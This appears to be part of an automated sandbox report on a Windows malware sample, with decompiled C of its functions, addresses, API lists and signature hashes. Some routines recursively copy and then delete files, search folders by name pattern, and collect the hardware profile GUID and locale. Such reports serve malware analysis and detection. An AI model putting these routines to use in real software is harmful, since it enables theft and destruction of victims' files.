                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharFileInternetMultiWide_memcpy_s$HttpInfoPointerQueryRead_memset
                                                                                                                              • String ID: text
                                                                                                                              • API String ID: 2061621289-999008199
                                                                                                                              • Opcode ID: 56cc44a652979a3dfb6213643a8babb117dafe26a23d7cc4f79d7bd809ac16db
                                                                                                                              • Instruction ID: b5d8de66111580073d5011e1a7dbd941f0c671664ab485ed23b031e4cb8c210f
                                                                                                                              • Opcode Fuzzy Hash: 56cc44a652979a3dfb6213643a8babb117dafe26a23d7cc4f79d7bd809ac16db
                                                                                                                              • Instruction Fuzzy Hash: 10F114B5A002289FDB24CF58CC80BDAB7B5BF49304F5082D9E509AB391D775AE81CF85
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00420540, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 151fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 37%
                                                                                                                              			E00420540(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v276;
				void* _v280;
				struct _WIN32_FIND_DATAA _v604;
				char _v868;
				char _v1132;
				char* _v1136;
				intOrPtr* _v1140;
				char _v1141;
				char _v1142;
				intOrPtr _v1148;
				intOrPtr _v1152;
				intOrPtr* _v1156;
				intOrPtr* _v1160;
				char _v1161;
				char _v1162;
				intOrPtr _v1168;
				intOrPtr _v1172;
				signed int _t72;
				void* _t77;
				char _t78;
				int _t81;
				char _t83;
				void* _t87;
				char _t97;
				char _t98;
				void* _t99;
				intOrPtr* _t117;
				intOrPtr* _t118;
				void* _t124;
				void* _t125;
				signed int _t126;
				void* _t127;
				void* _t128;
				void* _t130;
				void* _t131;

				_t125 = __esi;
				_t124 = __edi;
				_t99 = __ebx;
				_t72 =  *0x4301f4; // 0xe687535
				_v8 = _t72 ^ _t126;
				 *0x432768( &_v276, "%s\\*", _a12);
				_t128 = _t127 + 0xc;
				_t116 =  &_v604;
				_t77 = FindFirstFileA( &_v276,  &_v604); // executed
				_v280 = _t77;
				if(_v280 != 0xffffffff) {
					do {
						_v1136 = ".";
						_v1140 =  &(_v604.cFileName);
						while(1) {
							_t117 = _v1140;
							_t78 =  *_t117;
							_v1141 = _t78;
							if(_t78 !=  *_v1136) {
								break;
							}
							if(_v1141 == 0) {
								L7:
								_v1148 = 0;
							} else {
								_t117 = _v1140;
								_t98 =  *((intOrPtr*)(_t117 + 1));
								_v1142 = _t98;
								_t19 =  &(_v1136[1]); // 0x2e000000
								if(_t98 !=  *_t19) {
									break;
								} else {
									_v1140 = _v1140 + 2;
									_v1136 =  &(_v1136[2]);
									if(_v1142 != 0) {
										continue;
									} else {
										goto L7;
									}
								}
							}
							L9:
							_v1152 = _v1148;
							if(_v1152 != 0) {
								_v1156 = "..";
								_v1160 =  &(_v604.cFileName);
								while(1) {
									_t118 = _v1160;
									_t83 =  *_t118;
									_v1161 = _t83;
									if(_t83 !=  *_v1156) {
										break;
									}
									if(_v1161 == 0) {
										L15:
										_v1168 = 0;
									} else {
										_t118 = _v1160;
										_t97 =  *((intOrPtr*)(_t118 + 1));
										_v1162 = _t97;
										_t41 = _v1156 + 1; // 0x2500002e
										if(_t97 !=  *_t41) {
											break;
										} else {
											_v1160 = _v1160 + 2;
											_v1156 = _v1156 + 2;
											if(_v1162 != 0) {
												continue;
											} else {
												goto L15;
											}
										}
									}
									L17:
									_v1172 = _v1168;
									if(_v1172 != 0) {
										 *0x432768( &_v1132, "%s\\%s", _a12,  &(_v604.cFileName));
										_t87 = E004052FA(_t125, _a8, 0x429492);
										_t130 = _t128 + 0x18;
										if(_t87 != 0) {
											 *0x432768( &_v868, "%s\\%s", _a8,  &(_v604.cFileName));
											_t131 = _t130 + 0x10;
										} else {
											 *0x432768( &_v868, "%s",  &(_v604.cFileName));
											_t131 = _t130 + 0xc;
										}
										E00419580(_a4,  &_v868,  &_v1132); // executed
										DeleteFileA( &_v1132); // executed
										E00420540(_t99, _t124, _t125, _a4,  &_v868,  &_v1132); // executed
										_t128 = _t131 + 0x18;
									} else {
										goto L18;
									}
									goto L23;
								}
								asm("sbb edx, edx");
								asm("sbb edx, 0xffffffff");
								_v1168 = _t118;
								goto L17;
							}
							goto L23;
						}
						asm("sbb edx, edx");
						asm("sbb edx, 0xffffffff");
						_v1148 = _t117;
						goto L9;
						L23:
						_t116 =  &_v604;
						_t81 = FindNextFileA(_v280,  &_v604); // executed
					} while (_t81 != 0);
					_t77 =  *0x43278c(_v280);
				} else {
				}
				return E00404354(_t77, _t99, _v8 ^ _t126, _t116, _t124, _t125);
			}







































                                                                                                                              0x00420540
                                                                                                                              0x00420540
                                                                                                                              0x00420540
                                                                                                                              0x00420549
                                                                                                                              0x00420550
                                                                                                                              0x00420563
                                                                                                                              0x00420569
                                                                                                                              0x0042056c
                                                                                                                              0x0042057a
                                                                                                                              0x00420580
                                                                                                                              0x0042058d
                                                                                                                              0x00420594
                                                                                                                              0x00420594
                                                                                                                              0x004205a4
                                                                                                                              0x004205aa
                                                                                                                              0x004205aa
                                                                                                                              0x004205b0
                                                                                                                              0x004205b2
                                                                                                                              0x004205c0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004205c9
                                                                                                                              0x004205fc
                                                                                                                              0x004205fc
                                                                                                                              0x004205cb
                                                                                                                              0x004205cb
                                                                                                                              0x004205d1
                                                                                                                              0x004205d4
                                                                                                                              0x004205e0
                                                                                                                              0x004205e3
                                                                                                                              0x00000000
                                                                                                                              0x004205e5
                                                                                                                              0x004205e5
                                                                                                                              0x004205ec
                                                                                                                              0x004205fa
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004205fa
                                                                                                                              0x004205e3
                                                                                                                              0x00420613
                                                                                                                              0x00420619
                                                                                                                              0x00420626
                                                                                                                              0x0042062c
                                                                                                                              0x0042063c
                                                                                                                              0x00420642
                                                                                                                              0x00420642
                                                                                                                              0x00420648
                                                                                                                              0x0042064a
                                                                                                                              0x00420658
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00420661
                                                                                                                              0x00420694
                                                                                                                              0x00420694
                                                                                                                              0x00420663
                                                                                                                              0x00420663
                                                                                                                              0x00420669
                                                                                                                              0x0042066c
                                                                                                                              0x00420678
                                                                                                                              0x0042067b
                                                                                                                              0x00000000
                                                                                                                              0x0042067d
                                                                                                                              0x0042067d
                                                                                                                              0x00420684
                                                                                                                              0x00420692
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00420692
                                                                                                                              0x0042067b
                                                                                                                              0x004206ab
                                                                                                                              0x004206b1
                                                                                                                              0x004206be
                                                                                                                              0x004206dc
                                                                                                                              0x004206ee
                                                                                                                              0x004206f3
                                                                                                                              0x004206f8
                                                                                                                              0x0042072f
                                                                                                                              0x00420735
                                                                                                                              0x004206fa
                                                                                                                              0x0042070d
                                                                                                                              0x00420713
                                                                                                                              0x00420713
                                                                                                                              0x0042074a
                                                                                                                              0x00420759
                                                                                                                              0x00420771
                                                                                                                              0x00420776
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004206be
                                                                                                                              0x004206a0
                                                                                                                              0x004206a2
                                                                                                                              0x004206a5
                                                                                                                              0x00000000
                                                                                                                              0x004206a5
                                                                                                                              0x00000000
                                                                                                                              0x00420626
                                                                                                                              0x00420608
                                                                                                                              0x0042060a
                                                                                                                              0x0042060d
                                                                                                                              0x00000000
                                                                                                                              0x00420779
                                                                                                                              0x00420779
                                                                                                                              0x00420787
                                                                                                                              0x0042078d
                                                                                                                              0x0042079c
                                                                                                                              0x00000000
                                                                                                                              0x0042058f
                                                                                                                              0x004207af

                                                                                                                              APIs
                                                                                                                              • FindFirstFileA.KERNELBASE(?,?), ref: 0042057A
                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00420787
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FileFind$FirstNext
                                                                                                                              • String ID: %s\%s$%s\%s$%s\*
                                                                                                                              • API String ID: 1690352074-445461498
                                                                                                                              • Opcode ID: b36d20a79696500d5966cc1085c2a3eae8138d24e48df022eca772712e802837
                                                                                                                              • Instruction ID: 325be172129785ba22ad8cdf846aec29f32f218cb4471343c49e7a9d9cf57eda
                                                                                                                              • Opcode Fuzzy Hash: b36d20a79696500d5966cc1085c2a3eae8138d24e48df022eca772712e802837
                                                                                                                              • Instruction Fuzzy Hash: C7618CB0A042289FCB24CF64EC44BEAB7B5AB48304F4486DAE64952242D7759E89CF19
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041E640, Relevance: 7.7, APIs: 5, Instructions: 236fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 91%
                                                                                                                              			E0041E640(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				char _v276;
				void* _v280;
				struct _WIN32_FIND_DATAA _v604;
				char _v868;
				char* _v872;
				intOrPtr* _v876;
				char _v877;
				char _v878;
				intOrPtr _v884;
				intOrPtr _v888;
				intOrPtr* _v892;
				intOrPtr* _v896;
				char _v897;
				char _v898;
				intOrPtr _v904;
				intOrPtr _v908;
				signed int _t103;
				int _t108;
				intOrPtr* _t109;
				int _t111;
				intOrPtr* _t113;
				intOrPtr _t116;
				void* _t117;
				intOrPtr _t118;
				void* _t119;
				intOrPtr _t120;
				void* _t121;
				void* _t143;
				CHAR* _t144;
				char _t146;
				char _t151;
				CHAR* _t153;
				char _t170;
				char _t171;
				void* _t197;
				void* _t198;
				signed int _t199;
				void* _t200;
				void* _t201;
				void* _t203;
				void* _t204;

				_t198 = __esi;
				_t197 = __edi;
				_t143 = __ebx;
				_t103 =  *0x4301f4; // 0xe687535
				_v8 = _t103 ^ _t199;
				_t144 =  *0x4324d0; // 0x2336830
				_t172 =  &_v276;
				wsprintfA( &_v276, _t144, _a8);
				_t201 = _t200 + 0xc;
				_t108 = FindFirstFileA( &_v276,  &_v604); // executed
				_v280 = _t108;
				if(_v280 != 0xffffffff) {
					do {
						_v872 = ".";
						_v876 =  &(_v604.cFileName);
						while(1) {
							_t109 = _v876;
							_t146 =  *_t109;
							_v877 = _t146;
							if(_t146 !=  *_v872) {
								break;
							}
							if(_v877 == 0) {
								L7:
								_v884 = 0;
								L9:
								_v888 = _v884;
								if(_v888 == 0) {
									L18:
									goto L27;
								} else {
									_v892 = "..";
									_v896 =  &(_v604.cFileName);
									while(1) {
										_t113 = _v896;
										_t151 =  *_t113;
										_v897 = _t151;
										if(_t151 !=  *_v892) {
											break;
										}
										if(_v897 == 0) {
											L15:
											_v904 = 0;
											L17:
											_v908 = _v904;
											if(_v908 != 0) {
												_t153 =  *0x4322bc; // 0x2330540
												wsprintfA( &_v868, _t153, _a8,  &(_v604.cFileName));
												_t116 =  *0x4322d0; // 0x2336920
												_t117 = E004052FA(_t198,  &(_v604.cFileName), _t116);
												_t203 = _t201 + 0x18;
												if(_t117 != 0) {
													_t118 =  *0x4320e4; // 0x2336810
													_t119 = E004052FA(_t198,  &(_v604.cFileName), _t118);
													_t204 = _t203 + 8;
													if(_t119 != 0) {
														_t120 =  *0x432154; // 0x2336890
														_t121 = E004052FA(_t198,  &(_v604.cFileName), _t120);
														_t201 = _t204 + 8;
														if(_t121 != 0) {
															if((_v604.dwFileAttributes & 0x00000010) != 0) {
																E0041E640(_t143, _t197, _t198,  &(_v604.cFileName),  &_v868, _a12, _a16, _a20); // executed
																_t201 = _t201 + 0x14;
															}
														} else {
															E0041DA80(_t143, _t197, _t198,  &_v868, _a4, _a12, _a16, _a20); // executed
															_push(_a20);
															_push(_a16);
															E0041B7B0(_t143, _t197, _t198,  &_v868, _a4, _a12); // executed
															E0041E640(_t143, _t197, _t198,  &(_v604.cFileName),  &_v868, _a12, _a16, _a20); // executed
															_t201 = _t201 + 0x3c;
														}
													} else {
														E0041DCA0(_t143, _t197, _t198,  &_v868, _a4, _a12, _a16, _a20); // executed
														E0041E640(_t143, _t197, _t198,  &(_v604.cFileName),  &_v868, _a12, _a16, _a20); // executed
														_t201 = _t204 + 0x28;
													}
												} else {
													E0041E0E0(_t143, _t197, _t198, _a4,  &_v868, _a12, _a16, _a20); // executed
													E0041E640(_t143, _t197, _t198,  &(_v604.cFileName),  &_v868, _a12, _a16, _a20); // executed
													_t201 = _t203 + 0x28;
												}
												goto L27;
											}
											goto L18;
										}
										_t113 = _v896;
										_t170 =  *((intOrPtr*)(_t113 + 1));
										_v898 = _t170;
										_t41 = _v892 + 1; // 0x2e00002e
										if(_t170 !=  *_t41) {
											break;
										}
										_v896 = _v896 + 2;
										_v892 = _v892 + 2;
										if(_v898 != 0) {
											continue;
										}
										goto L15;
									}
									asm("sbb eax, eax");
									asm("sbb eax, 0xffffffff");
									_v904 = _t113;
									goto L17;
								}
							}
							_t109 = _v876;
							_t171 =  *((intOrPtr*)(_t109 + 1));
							_v878 = _t171;
							_t19 =  &(_v872[1]); // 0x2e000000
							if(_t171 !=  *_t19) {
								break;
							}
							_v876 = _v876 + 2;
							_v872 =  &(_v872[2]);
							if(_v878 != 0) {
								continue;
							}
							goto L7;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						_v884 = _t109;
						goto L9;
						L27:
						_t172 =  &_v604;
						_t111 = FindNextFileA(_v280,  &_v604); // executed
					} while (_t111 != 0);
					_t108 = FindClose(_v280); // executed
					goto L29;
				} else {
					L29:
					return E00404354(_t108, _t143, _v8 ^ _t199, _t172, _t197, _t198);
				}
			}













































                                                                                                                              0x0041e640
                                                                                                                              0x0041e640
                                                                                                                              0x0041e640
                                                                                                                              0x0041e649
                                                                                                                              0x0041e650
                                                                                                                              0x0041e657
                                                                                                                              0x0041e65e
                                                                                                                              0x0041e665
                                                                                                                              0x0041e66b
                                                                                                                              0x0041e67c
                                                                                                                              0x0041e682
                                                                                                                              0x0041e68f
                                                                                                                              0x0041e696
                                                                                                                              0x0041e696
                                                                                                                              0x0041e6a6
                                                                                                                              0x0041e6ac
                                                                                                                              0x0041e6ac
                                                                                                                              0x0041e6b2
                                                                                                                              0x0041e6b4
                                                                                                                              0x0041e6c2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041e6cb
                                                                                                                              0x0041e6fe
                                                                                                                              0x0041e6fe
                                                                                                                              0x0041e715
                                                                                                                              0x0041e71b
                                                                                                                              0x0041e728
                                                                                                                              0x0041e7c2
                                                                                                                              0x00000000
                                                                                                                              0x0041e72e
                                                                                                                              0x0041e72e
                                                                                                                              0x0041e73e
                                                                                                                              0x0041e744
                                                                                                                              0x0041e744
                                                                                                                              0x0041e74a
                                                                                                                              0x0041e74c
                                                                                                                              0x0041e75a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041e763
                                                                                                                              0x0041e796
                                                                                                                              0x0041e796
                                                                                                                              0x0041e7ad
                                                                                                                              0x0041e7b3
                                                                                                                              0x0041e7c0
                                                                                                                              0x0041e7d2
                                                                                                                              0x0041e7e0
                                                                                                                              0x0041e7e9
                                                                                                                              0x0041e7f6
                                                                                                                              0x0041e7fb
                                                                                                                              0x0041e800
                                                                                                                              0x0041e848
                                                                                                                              0x0041e855
                                                                                                                              0x0041e85a
                                                                                                                              0x0041e85f
                                                                                                                              0x0041e8a7
                                                                                                                              0x0041e8b4
                                                                                                                              0x0041e8b9
                                                                                                                              0x0041e8be
                                                                                                                              0x0041e92b
                                                                                                                              0x0041e947
                                                                                                                              0x0041e94c
                                                                                                                              0x0041e94c
                                                                                                                              0x0041e8c0
                                                                                                                              0x0041e8d7
                                                                                                                              0x0041e8e2
                                                                                                                              0x0041e8e6
                                                                                                                              0x0041e8f6
                                                                                                                              0x0041e918
                                                                                                                              0x0041e91d
                                                                                                                              0x0041e91d
                                                                                                                              0x0041e861
                                                                                                                              0x0041e878
                                                                                                                              0x0041e89a
                                                                                                                              0x0041e89f
                                                                                                                              0x0041e89f
                                                                                                                              0x0041e802
                                                                                                                              0x0041e819
                                                                                                                              0x0041e83b
                                                                                                                              0x0041e840
                                                                                                                              0x0041e840
                                                                                                                              0x00000000
                                                                                                                              0x0041e800
                                                                                                                              0x00000000
                                                                                                                              0x0041e7c0
                                                                                                                              0x0041e765
                                                                                                                              0x0041e76b
                                                                                                                              0x0041e76e
                                                                                                                              0x0041e77a
                                                                                                                              0x0041e77d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041e77f
                                                                                                                              0x0041e786
                                                                                                                              0x0041e794
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041e794
                                                                                                                              0x0041e7a2
                                                                                                                              0x0041e7a4
                                                                                                                              0x0041e7a7
                                                                                                                              0x00000000
                                                                                                                              0x0041e7a7
                                                                                                                              0x0041e728
                                                                                                                              0x0041e6cd
                                                                                                                              0x0041e6d3
                                                                                                                              0x0041e6d6
                                                                                                                              0x0041e6e2
                                                                                                                              0x0041e6e5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041e6e7
                                                                                                                              0x0041e6ee
                                                                                                                              0x0041e6fc
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041e6fc
                                                                                                                              0x0041e70a
                                                                                                                              0x0041e70c
                                                                                                                              0x0041e70f
                                                                                                                              0x00000000
                                                                                                                              0x0041e94f
                                                                                                                              0x0041e94f
                                                                                                                              0x0041e95d
                                                                                                                              0x0041e963
                                                                                                                              0x0041e972
                                                                                                                              0x00000000
                                                                                                                              0x0041e691
                                                                                                                              0x0041e978
                                                                                                                              0x0041e985
                                                                                                                              0x0041e985

                                                                                                                              APIs
                                                                                                                              • wsprintfA.USER32 ref: 0041E665
                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0041E67C
                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0041E95D
                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 0041E972
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 180737720-0
                                                                                                                              • Opcode ID: c92bd7faf16dffcffc2816398490ef8bca13cdd8a6ab111b19ae1ea951e02468
                                                                                                                              • Instruction ID: 9a695b1c06b5e9649a3d6d3fc0282213006664483c1bee77f7df638368a39451
                                                                                                                              • Opcode Fuzzy Hash: c92bd7faf16dffcffc2816398490ef8bca13cdd8a6ab111b19ae1ea951e02468
                                                                                                                              • Instruction Fuzzy Hash: 50A17CB6904218ABCB25DF65DC84ADBB7B9BB58300F0486CEF91993240E6349FC4CF64
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00416D00, Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 96%
                                                                                                                              			E00416D00(intOrPtr __ebx, void* __ecx, intOrPtr __edi, intOrPtr __esi, void* _a4, long _a8) {
				long _v8;
				intOrPtr _v12;
				struct _FILETIME _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				struct _SYSTEMTIME _v48;
				void* _v52;
				signed int _t79;
				intOrPtr _t84;
				long _t86;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr _t105;
				intOrPtr _t120;
				intOrPtr _t122;
				long _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				signed int _t144;

				_t143 = __esi;
				_t142 = __edi;
				_t108 = __ebx;
				_t79 =  *0x4301f4; // 0xe687535
				_v32 = _t79 ^ _t144;
				_v52 = __ecx;
				 *(_v52 + 0x7c) = 0;
				 *(_v52 + 0x84) = 0;
				 *((char*)(_v52 + 0x80)) = 0;
				 *(_v52 + 0x78) = 0;
				 *(_v52 + 0x70) = 0;
				_t131 = _v52;
				 *(_v52 + 0x90) = 0;
				 *(_v52 + 0x74) = 0;
				if(_a4 != 0 && _a4 != 0xffffffff) {
					_t86 = SetFilePointer( *(_v52 + 4), 0, 0, 1); // executed
					_v8 = _t86;
					if(_v8 == 0xffffffff) {
						 *((intOrPtr*)(_v52 + 0x4c)) = 0x80000000;
						 *(_v52 + 0x70) = 0xffffffff;
						if(_a8 != 0) {
							 *(_v52 + 0x70) = _a8;
						}
						 *((char*)(_v52 + 0x6c)) = 0;
						GetLocalTime( &_v48);
						SystemTimeToFileTime( &_v48,  &_v20);
						_t135 = _v20.dwLowDateTime;
						E00412EB0(_t135, _v20.dwHighDateTime,  &_v28,  &_v24);
						_t93 = E00412F70(_v20.dwLowDateTime, _v20.dwHighDateTime);
						_t120 = _v52;
						 *((intOrPtr*)(_t120 + 0x50)) = _t93;
						 *(_t120 + 0x54) = _t135;
						_t136 = _v52;
						_t94 = _v52;
						 *((intOrPtr*)(_t136 + 0x58)) =  *((intOrPtr*)(_t94 + 0x50));
						 *((intOrPtr*)(_t136 + 0x5c)) =  *((intOrPtr*)(_t94 + 0x54));
						_t122 = _v52;
						_t137 = _v52;
						 *((intOrPtr*)(_t122 + 0x60)) =  *((intOrPtr*)(_t137 + 0x50));
						 *((intOrPtr*)(_t122 + 0x64)) =  *((intOrPtr*)(_t137 + 0x54));
						_t131 = _v52;
						 *(_v52 + 0x68) = _v24 & 0x0000ffff | (_v28 & 0x0000ffff) << 0x00000010;
						 *(_v52 + 0x7c) = _a4;
						_t84 = 0;
					} else {
						_t131 = _v52 + 0x70;
						_t105 = E00414DA0(__ebx, _v52 + 0x70, __edi, __esi, _a4, _v52 + 0x4c, _v52 + 0x70, _v52 + 0x50, _v52 + 0x68); // executed
						_v12 = _t105;
						if(_v12 == 0) {
							SetFilePointer(_a4, 0, 0, 0); // executed
							 *((char*)(_v52 + 0x6c)) = 1;
							_t131 = _a4;
							 *(_v52 + 0x7c) = _a4;
							_t84 = 0;
						} else {
							_t84 = _v12;
						}
					}
				} else {
					_t84 = 0x10000;
				}
				return E00404354(_t84, _t108, _v32 ^ _t144, _t131, _t142, _t143);
			}























                                                                                                                              0x00416d00
                                                                                                                              0x00416d00
                                                                                                                              0x00416d00
                                                                                                                              0x00416d06
                                                                                                                              0x00416d0d
                                                                                                                              0x00416d10
                                                                                                                              0x00416d16
                                                                                                                              0x00416d20
                                                                                                                              0x00416d2d
                                                                                                                              0x00416d37
                                                                                                                              0x00416d41
                                                                                                                              0x00416d48
                                                                                                                              0x00416d4b
                                                                                                                              0x00416d58
                                                                                                                              0x00416d63
                                                                                                                              0x00416d82
                                                                                                                              0x00416d88
                                                                                                                              0x00416d8f
                                                                                                                              0x00416df9
                                                                                                                              0x00416e03
                                                                                                                              0x00416e0e
                                                                                                                              0x00416e16
                                                                                                                              0x00416e16
                                                                                                                              0x00416e1c
                                                                                                                              0x00416e24
                                                                                                                              0x00416e32
                                                                                                                              0x00416e44
                                                                                                                              0x00416e48
                                                                                                                              0x00416e58
                                                                                                                              0x00416e60
                                                                                                                              0x00416e63
                                                                                                                              0x00416e66
                                                                                                                              0x00416e69
                                                                                                                              0x00416e6c
                                                                                                                              0x00416e72
                                                                                                                              0x00416e78
                                                                                                                              0x00416e7b
                                                                                                                              0x00416e7e
                                                                                                                              0x00416e84
                                                                                                                              0x00416e8a
                                                                                                                              0x00416e9a
                                                                                                                              0x00416e9d
                                                                                                                              0x00416ea6
                                                                                                                              0x00416ea9
                                                                                                                              0x00416d91
                                                                                                                              0x00416da2
                                                                                                                              0x00416db1
                                                                                                                              0x00416db9
                                                                                                                              0x00416dc0
                                                                                                                              0x00416dd4
                                                                                                                              0x00416ddd
                                                                                                                              0x00416de4
                                                                                                                              0x00416de7
                                                                                                                              0x00416dea
                                                                                                                              0x00416dc2
                                                                                                                              0x00416dc2
                                                                                                                              0x00416dc2
                                                                                                                              0x00416dc0
                                                                                                                              0x00416d6b
                                                                                                                              0x00416d6b
                                                                                                                              0x00416d6b
                                                                                                                              0x00416eb8

                                                                                                                              APIs
                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00416D82
                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416DD4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FilePointer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 973152223-0
                                                                                                                              • Opcode ID: 62618be7571622379a177c29d08db3d9d465c1196763cd63c7308417d0523072
                                                                                                                              • Instruction ID: 8e38468280a114e1fcc2f1689bfe0d7eb919423b9b9b5c3e97927802504e3f29
                                                                                                                              • Opcode Fuzzy Hash: 62618be7571622379a177c29d08db3d9d465c1196763cd63c7308417d0523072
                                                                                                                              • Instruction Fuzzy Hash: A3510974A10219EFDB04DFA8D894FAEBBB1BF48304F108659E815AB391D735E846CF94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041B160, Relevance: 6.0, APIs: 4, Instructions: 34memorystringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 63%
                                                                                                                              			E0041B160() {
				signed int _v8;
				struct tagHW_PROFILE_INFOA _v140;
				intOrPtr* _v144;
				signed int _t9;
				int _t12;
				intOrPtr _t13;
				intOrPtr _t19;
				intOrPtr _t25;
				intOrPtr _t26;
				signed int _t27;

				_t9 =  *0x4301f4; // 0xe687535
				_v8 = _t9 ^ _t27;
				_t12 = GetCurrentHwProfileA( &_v140); // executed
				if(_t12 == 0) {
					_t13 =  *0x4322d4; // 0x23366f0
				} else {
					_v144 = HeapAlloc(GetProcessHeap(), 0, 0x64);
					_t24 = _v144;
					 *_v144 = 0;
					 *0x4328c4(_v144,  &(_v140.szHwProfileGuid));
					_t13 = _v144;
				}
				return E00404354(_t13, _t19, _v8 ^ _t27, _t24, _t25, _t26);
			}













                                                                                                                              0x0041b169
                                                                                                                              0x0041b170
                                                                                                                              0x0041b17a
                                                                                                                              0x0041b182
                                                                                                                              0x0041b1c3
                                                                                                                              0x0041b184
                                                                                                                              0x0041b195
                                                                                                                              0x0041b19d
                                                                                                                              0x0041b1a3
                                                                                                                              0x0041b1b3
                                                                                                                              0x0041b1b9
                                                                                                                              0x0041b1b9
                                                                                                                              0x0041b1d5

                                                                                                                              APIs
                                                                                                                              • GetCurrentHwProfileA.ADVAPI32(?), ref: 0041B17A
                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000064), ref: 0041B188
                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0041B18F
                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 0041B1B3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$AllocCurrentProcessProfilelstrcat
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1316908231-0
                                                                                                                              • Opcode ID: 5e9cce92471f79f1fc9266c3d6701d0b5255154bddcb10c6d5bfd8fdd7ac170c
                                                                                                                              • Instruction ID: 04581f43b4f816d405aec1f7429879156f298d46bcd32117c8786c3065179c69
                                                                                                                              • Opcode Fuzzy Hash: 5e9cce92471f79f1fc9266c3d6701d0b5255154bddcb10c6d5bfd8fdd7ac170c
                                                                                                                              • Instruction Fuzzy Hash: 1301E171A00119DBDB18DF64DD55F99B7B8BB08300F0091AAA94AD7280DE749A84CF64
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041AA60, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041AB23
                                                                                                                              • _memset.LIBCMT ref: 0041AB90
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: InfoLocale_memset
                                                                                                                              • String ID: %s / %s
                                                                                                                              • API String ID: 517207984-2910687431
